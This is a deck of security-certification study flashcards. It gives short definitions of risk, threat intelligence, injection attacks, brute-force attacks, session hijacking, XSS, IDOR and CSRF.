1.0 Security Concepts (Ch 1-4) Flashcards
(75 cards)
The deep web is characterized by…
Not being indexed by search engines
The dark web is characterized by…
using specific software configs to access it
What is searchsploit?
A command-line tool that enables you to download the Exploit Database from Offensive Security
The likelihood or probability of the occurrence or realization of a threat is…
risk
The three basic elements of risk are:
assets, threats, and vulnerabilities
RMF stands for
Risk Management Framework
Knowledge about existing or emerging threats is…
threat intelligence
The five-step threat intelligence process:
Planning & Direction
Collection
Processing
Analysis and Production
Dissemination
What are STIX, TAXII, CybOX, OpenIOC, and OpenC2?
Means of disseminating threat information
What is a TIP?
Threat Intelligence Platform, a way to aggregate intelligence info from multiple sources
SQL, HTML, and command are three types of…
injection vulnerabilities
What might a SQL injection attack do?
View, insert, modify, or delete database records
In-band, out-of-band, or blind/inferential are types of…
SQL injection attacks
In a command injection attack, commands will be executed with what privilege level?
The privilege level of the compromised application
What happens in an online brute-force attack?
Attacker tries to log in as user by guessing their password
What happens in an offline brute-force attack?
Attacker tries to gain access to encrypted or hashed passwords
Predicting tokens, session sniffing, MITM, and MITB are four techniques by which an attacker can execute a…
session hijacking
XSS stands for
Cross-Site Scripting
Back-end parameters visible in URLs are what kind of vulnerabilities?
Insecure Direct Object Reference Vulnerabilities
Three categories of XSS:
Reflected (nonpersistent)
Stored (persistent)
DOM-based
Getting a user to click on a malicious link is what type of XSS attack?
Reflective (non-persistent)
If a user requests information that’s stored on a vulnerable or malicious server, what type of XSS attack is this?
Stored (persistent)
What do you call a language-independent, cross-platform API that treats HTML/XHTML/XML documents as a tree structure?
DOM (Document Object Model)
What is a CSRF (or XSRF) attack?
Cross-Site Request Forgery - when unauthorized commands are sent to an application from a trusted user.
aka one-click attacks or session riding